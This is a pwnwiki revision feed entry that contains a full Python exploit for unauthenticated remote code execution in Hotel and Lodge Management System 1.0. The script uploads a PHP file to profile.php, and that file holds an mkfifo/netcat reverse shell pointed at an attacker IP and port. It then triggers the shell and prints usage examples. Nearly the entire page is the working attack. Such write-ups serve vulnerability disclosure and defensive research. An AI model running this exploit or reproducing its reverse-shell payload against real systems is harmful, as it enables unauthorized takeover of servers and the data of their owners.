https://pwnwiki.com/index.php?action=history&feed=atom&title=Hotel_and_Lodge_Management_System_1.0_%E6%9C%AA%E7%B6%93%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E 2026-04-08T21:08:06Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=Hotel_and_Lodge_Management_System_1.0_%E6%9C%AA%E7%B6%93%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=641&oldid=prev 2021-03-23T03:04:00Z

<p>Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: Hotel and Lodge Management System 1.0 - Remote Code Execution (Unauthenticated) # Date: 07-03-2021 # Exploit Author: Christian Vierschilling # V...&quot;</p> <p><b>New page</b></p><div>==EXP==<br /> &lt;pre&gt;<br /> # Exploit Title: Hotel and Lodge Management System 1.0 - Remote Code Execution (Unauthenticated)<br /> # Date: 07-03-2021<br /> # Exploit Author: Christian Vierschilling<br /> # Vendor Homepage: https://www.sourcecodester.com<br /> # Software Link: https://www.sourcecodester.com/php/13707/hotel-and-lodge-management-system.html<br /> # Version: 1.0<br /> # Tested on: PHP 7.4.14, Linux x64_x86<br /> <br /> # --- Description --- #<br /> <br /> # The web application allows for an unauthenticated file upload which can result in a Remote Code Execution.<br /> # Executing this script against a target might return a reverse php shell.<br /> <br /> # --- Proof of concept --- #<br /> <br /> #!/usr/bin/python3<br /> import random<br /> import sys<br /> import requests<br /> from requests_toolbelt.multipart.encoder import MultipartEncoder<br /> <br /> def file_upload(target_ip, attacker_ip, attacker_port):<br /> print(&quot;(+) Setting up reverse shell php file ..&quot;)<br /> random_file_name = str(random.randint(100000, 999999)) + &quot;revshell.php&quot;<br /> revshell_string = '&lt;?php exec(&quot;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc {} {} &gt;/tmp/f&quot;); ?&gt;'.format(attacker_ip, attacker_port)<br /> m = MultipartEncoder(fields={'image': (random_file_name, revshell_string, 'application/x-php'),'btn_update':''})<br /> print(&quot;(+) Trying to upload it ..&quot;)<br /> r1 = requests.post('http://{}/hotel/source code/profile.php'.format(target_ip), data=m, headers={'Content-Type': m.content_type})<br /> r2 = requests.get('http://{}/hotel/source code/uploadImage/Profile/'.format(target_ip))<br /> if random_file_name in r2.text:<br /> print(&quot;(+) File upload seems to have been successful!&quot;)<br /> return random_file_name<br /> else:<br /> print(&quot;(-) Oh noes, file upload failed .. quitting!&quot;)<br /> exit()<br /> <br /> def trigger_shell(target_ip, random_file_name):<br /> print(&quot;(+) Now trying to trigger our shell..&quot;)<br /> r3 = requests.get('http://{}/hotel/source code/uploadImage/Profile/{}'.format(target_ip, random_file_name))<br /> return None<br /> <br /> def main():<br /> if len(sys.argv) != 4:<br /> print('(+) usage: %s &lt;target ip&gt; &lt;attacker ip&gt; &lt;attacker port&gt;' % sys.argv[0])<br /> print('(+) eg: %s 10.0.0.1 10.13.37.10 4444' % sys.argv[0])<br /> sys.exit(-1)<br /> <br /> target_ip = sys.argv[1]<br /> attacker_ip = sys.argv[2]<br /> attacker_port = sys.argv[3]<br /> <br /> revshell_file_name = file_upload(target_ip, attacker_ip, attacker_port)<br /> trigger_shell(target_ip, revshell_file_name)<br /> print(&quot;\n(+) done!&quot;)<br /> <br /> if __name__ == &quot;__main__&quot;:<br /> main()<br /> <br /> &lt;/pre&gt;</div>

Pwnwiki